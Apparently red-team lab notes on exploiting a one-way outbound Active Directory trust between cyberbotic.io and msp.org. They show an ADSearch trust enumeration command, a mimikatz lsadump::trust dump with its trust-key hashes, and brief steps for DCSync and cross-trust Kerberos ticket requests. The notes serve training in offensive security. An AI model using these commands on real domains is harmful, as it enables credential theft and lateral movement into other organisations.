One-Way Outbound
SourceName : cyberbotic.io
TargetName : msp.org
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Outbound
WhenCreated : 8/16/2022 9:49:17 AM
WhenChanged : 8/16/2022 9:49:17 AMObtain "domain user" access from CYBER to MSP by leveraging the shared credential for the trust
ADSearch.exe --search "(objectCategory=trustedDomain)" --domain cyberbotic.io --attributes distinguishedName,name,flatName,trustDirectionMove laterally to the DC itself and dump from memory
mimikatz lsadump::trust /patch
Domain: MSP.ORG (MSP / S-1-5-21-616357355-3455548143-339820157)
[ In ] CYBERBOTIC.IO -> MSP.ORG
[ Out ] MSP.ORG -> CYBERBOTIC.IO
8/16/2022 9:49:17 AM - CLEAR - 93 8e aa 1f 5f 6e 2a cc 51 7d d4 a8 07 f2 f0 2c a3 e0 20 3b 24 32 68 58 0d f8 ad cc
aes256_hmac 5db44be4317433d5ab1d3dea5925126d295d3e21c9682bca7fef76bc5a878f30
aes128_hmac 9851d2d80411e6d40122005d1c361579
rc4_hmac_nt f3fc2312d9d1f80b78e67d55d41ad496
[ In-1] CYBERBOTIC.IO -> MSP.ORG
[ Out-1] MSP.ORG -> CYBERBOTIC.IO
8/16/2022 9:49:17 AM - CLEAR - 93 8e aa 1f 5f 6e 2a cc 51 7d d4 a8 07 f2 f0 2c a3 e0 20 3b 24 32 68 58 0d f8 ad cc
aes256_hmac 5db44be4317433d5ab1d3dea5925126d295d3e21c9682bca7fef76bc5a878f30
aes128_hmac 9851d2d80411e6d40122005d1c361579
rc4_hmac_nt f3fc2312d9d1f80b78e67d55d41ad496Use DCSync with the TDO's GUID
Find trust accounts
Impersonate CYBER$ to request Kerberos tickets across the trust
This TGT can now be used to interact with the domain
Last updated